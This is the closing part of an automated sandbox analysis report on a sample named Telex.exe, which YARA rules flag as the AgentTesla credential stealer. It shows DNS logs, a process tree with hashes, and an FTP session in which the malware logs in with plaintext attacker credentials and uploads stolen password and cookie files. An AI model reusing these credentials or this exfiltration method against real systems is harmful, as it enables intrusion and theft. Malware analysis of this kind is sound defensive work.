                                        May 12, 2021 20:45:04.591690063 CEST5479553192.168.2.58.8.8.8
                                        May 12, 2021 20:45:04.640467882 CEST53547958.8.8.8192.168.2.5
                                        May 12, 2021 20:45:05.435034990 CEST4955753192.168.2.58.8.8.8
                                        May 12, 2021 20:45:05.483999968 CEST53495578.8.8.8192.168.2.5
                                        May 12, 2021 20:45:06.282599926 CEST6173353192.168.2.58.8.8.8
                                        May 12, 2021 20:45:06.332595110 CEST53617338.8.8.8192.168.2.5
                                        May 12, 2021 20:45:07.435309887 CEST6544753192.168.2.58.8.8.8
                                        May 12, 2021 20:45:07.494334936 CEST53654478.8.8.8192.168.2.5
                                        May 12, 2021 20:45:08.078578949 CEST5244153192.168.2.58.8.8.8
                                        May 12, 2021 20:45:08.127372980 CEST53524418.8.8.8192.168.2.5
                                        May 12, 2021 20:45:09.157319069 CEST6217653192.168.2.58.8.8.8
                                        May 12, 2021 20:45:09.216285944 CEST53621768.8.8.8192.168.2.5
                                        May 12, 2021 20:45:09.996418953 CEST5959653192.168.2.58.8.8.8
                                        May 12, 2021 20:45:10.045274019 CEST53595968.8.8.8192.168.2.5
                                        May 12, 2021 20:45:10.767517090 CEST6529653192.168.2.58.8.8.8
                                        May 12, 2021 20:45:10.820956945 CEST53652968.8.8.8192.168.2.5
                                        May 12, 2021 20:45:11.747227907 CEST6318353192.168.2.58.8.8.8
                                        May 12, 2021 20:45:11.796951056 CEST53631838.8.8.8192.168.2.5
                                        May 12, 2021 20:45:13.751530886 CEST6015153192.168.2.58.8.8.8
                                        May 12, 2021 20:45:13.803399086 CEST53601518.8.8.8192.168.2.5
                                        May 12, 2021 20:45:14.790069103 CEST5696953192.168.2.58.8.8.8
                                        May 12, 2021 20:45:14.838893890 CEST53569698.8.8.8192.168.2.5
                                        May 12, 2021 20:45:28.258604050 CEST5516153192.168.2.58.8.8.8
                                        May 12, 2021 20:45:28.322740078 CEST53551618.8.8.8192.168.2.5
                                        May 12, 2021 20:45:39.559171915 CEST5475753192.168.2.58.8.8.8
                                        May 12, 2021 20:45:39.632853031 CEST53547578.8.8.8192.168.2.5
                                        May 12, 2021 20:45:49.860152006 CEST4999253192.168.2.58.8.8.8
                                        May 12, 2021 20:45:49.921536922 CEST53499928.8.8.8192.168.2.5
                                        May 12, 2021 20:45:58.491646051 CEST6007553192.168.2.58.8.8.8
                                        May 12, 2021 20:45:58.553474903 CEST53600758.8.8.8192.168.2.5
                                        May 12, 2021 20:46:17.154283047 CEST5501653192.168.2.58.8.8.8
                                        May 12, 2021 20:46:17.227775097 CEST53550168.8.8.8192.168.2.5
                                        May 12, 2021 20:46:25.530039072 CEST6434553192.168.2.58.8.8.8
                                        May 12, 2021 20:46:25.594520092 CEST53643458.8.8.8192.168.2.5
                                        May 12, 2021 20:46:44.101670027 CEST5712853192.168.2.58.8.8.8
                                        May 12, 2021 20:46:44.174969912 CEST53571288.8.8.8192.168.2.5
                                        May 12, 2021 20:46:51.567100048 CEST5479153192.168.2.58.8.8.8
                                        May 12, 2021 20:46:51.709338903 CEST53547918.8.8.8192.168.2.5
                                        May 12, 2021 20:46:53.351011992 CEST5046353192.168.2.58.8.8.8
                                        May 12, 2021 20:46:53.419301987 CEST53504638.8.8.8192.168.2.5
                                        May 12, 2021 20:46:55.115961075 CEST5039453192.168.2.58.8.8.8
                                        May 12, 2021 20:46:55.181477070 CEST53503948.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 12, 2021 20:46:51.567100048 CEST192.168.2.58.8.8.80x1ad2Standard query (0)ftp.universalinks.netA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 12, 2021 20:45:03.516536951 CEST8.8.8.8192.168.2.50x6701No error (0)api.globalsign.cloud104.18.24.243A (IP address)IN (0x0001)
                                        May 12, 2021 20:45:03.516536951 CEST8.8.8.8192.168.2.50x6701No error (0)api.globalsign.cloud104.18.25.243A (IP address)IN (0x0001)
                                        May 12, 2021 20:46:51.709338903 CEST8.8.8.8192.168.2.50x1ad2No error (0)ftp.universalinks.net192.145.239.54A (IP address)IN (0x0001)

                                        FTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        May 12, 2021 20:46:52.148454905 CEST2149728192.145.239.54192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 30 minutes of inactivity.
                                        May 12, 2021 20:46:52.150908947 CEST4972821192.168.2.5192.145.239.54USER bring4@universalinks.net
                                        May 12, 2021 20:46:52.347407103 CEST2149728192.145.239.54192.168.2.5331 User bring4@universalinks.net OK. Password required
                                        May 12, 2021 20:46:52.348239899 CEST4972821192.168.2.5192.145.239.54PASS {lafa{u^wEx8
                                        May 12, 2021 20:46:52.571746111 CEST2149728192.145.239.54192.168.2.5230 OK. Current restricted directory is /
                                        May 12, 2021 20:46:52.769409895 CEST2149728192.145.239.54192.168.2.5504 Unknown command
                                        May 12, 2021 20:46:52.773770094 CEST4972821192.168.2.5192.145.239.54PWD
                                        May 12, 2021 20:46:52.970360041 CEST2149728192.145.239.54192.168.2.5257 "/" is your current location
                                        May 12, 2021 20:46:52.975579023 CEST4972821192.168.2.5192.145.239.54TYPE I
                                        May 12, 2021 20:46:53.172095060 CEST2149728192.145.239.54192.168.2.5200 TYPE is now 8-bit binary
                                        May 12, 2021 20:46:53.172394037 CEST4972821192.168.2.5192.145.239.54PASV
                                        May 12, 2021 20:46:53.368855000 CEST2149728192.145.239.54192.168.2.5227 Entering Passive Mode (192,145,239,54,124,247)
                                        May 12, 2021 20:46:53.574423075 CEST4972821192.168.2.5192.145.239.54STOR PW_user-287400_2021_05_12_23_51_50.html
                                        May 12, 2021 20:46:53.770802975 CEST2149728192.145.239.54192.168.2.5150 Accepted data connection
                                        May 12, 2021 20:46:53.976913929 CEST2149728192.145.239.54192.168.2.5226-File successfully transferred
                                        226-File successfully transferred226 0.206 seconds (measured here), 2.20 Kbytes per second
                                        May 12, 2021 20:46:55.153923988 CEST4972821192.168.2.5192.145.239.54PASV
                                        May 12, 2021 20:46:55.350323915 CEST2149728192.145.239.54192.168.2.5227 Entering Passive Mode (192,145,239,54,124,203)
                                        May 12, 2021 20:46:55.548857927 CEST4972821192.168.2.5192.145.239.54STOR CO_user-287400_2021_05_12_23_51_54.zip
                                        May 12, 2021 20:46:55.745430946 CEST2149728192.145.239.54192.168.2.5150 Accepted data connection
                                        May 12, 2021 20:46:55.942846060 CEST2149728192.145.239.54192.168.2.5226-File successfully transferred
                                        226-File successfully transferred226 0.197 seconds (measured here), 6.52 Kbytes per second

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:20:45:09
                                        Start date:12/05/2021
                                        Path:C:\Users\user\Desktop\Telex.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Telex.exe'
                                        Imagebase:0x440000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:20:45:12
                                        Start date:12/05/2021
                                        Path:C:\Users\user\Desktop\Telex.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Telex.exe
                                        Imagebase:0x7e0000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:20:45:43
                                        Start date:12/05/2021
                                        Path:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
                                        Imagebase:0x140000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 26%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:20:45:49
                                        Start date:12/05/2021
                                        Path:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Imagebase:0x100000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:20:45:50
                                        Start date:12/05/2021
                                        Path:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Imagebase:0x360000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:20:45:50
                                        Start date:12/05/2021
                                        Path:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Imagebase:0xb50000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:20:45:51
                                        Start date:12/05/2021
                                        Path:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
                                        Imagebase:0xb10000
                                        File size:879616 bytes
                                        MD5 hash:01FE9288B37BDEB3684DB4BD497685E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Disassembly

                                        Code Analysis

                                        Reset < >